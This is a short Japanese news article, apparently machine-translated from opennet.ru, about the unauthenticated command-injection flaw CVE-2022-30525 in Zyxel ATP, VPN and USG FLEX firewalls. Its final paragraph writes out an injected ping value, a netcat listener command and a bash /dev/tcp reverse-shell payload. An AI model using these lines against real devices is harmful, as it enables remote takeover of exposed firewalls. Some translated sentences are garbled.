Zyxel ファイアウォールの脆弱性により、認証なしでコードが実行される

ATP、VPN、および USG FLEX シリーズの Zyxel デバイスで重大な脆弱性 (CVE-2022-30525) が確認されました。これらのデバイスは、企業内のファイアウォール、IDS、および VPN の運用を組織化するように設計されており、外部の攻撃者がデバイス上でコードを実行できるようになります。認証なしでユーザー権限のないデバイス。 攻撃を実行するには、攻撃者が HTTP/HTTPS プロトコルを使用してデバイスにリクエストを送信できる必要があります。 Zyxel は、ZLD 5.30 ファームウェア アップデートの脆弱性を修正しました。 Shodan サービスによると、現在グローバル ネットワーク上には HTTP/HTTPS 経由でリクエストを受け入れる潜在的に脆弱なデバイスが 16213 台あります。

操作は、認証なしでアクセスできる Web ハンドラー /ztp/cgi-bin/handler に特別に設計されたコマンドを送信することによって実行されます。 この問題は、lib_wan_settings.py ライブラリで使用され、setWanPortSt 操作の処理時に実行される os.system コールを使用してシステム上でコマンドを実行するときに、リクエスト パラメーターが適切にクリーンアップされないことが原因で発生します。

たとえば、攻撃者は文字列「;」を渡す可能性があります。 ping 192.168.1.210;" これにより、システム上で「ping 192.168.1.210」コマンドが実行されます。 コマンド シェルにアクセスするには、システム上で「nc -lvnp 1270」を実行し、「;」を使用してデバイスにリクエストを送信してリバース接続を開始します。 bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'。

出所: オープンネット.ru

コメントを追加します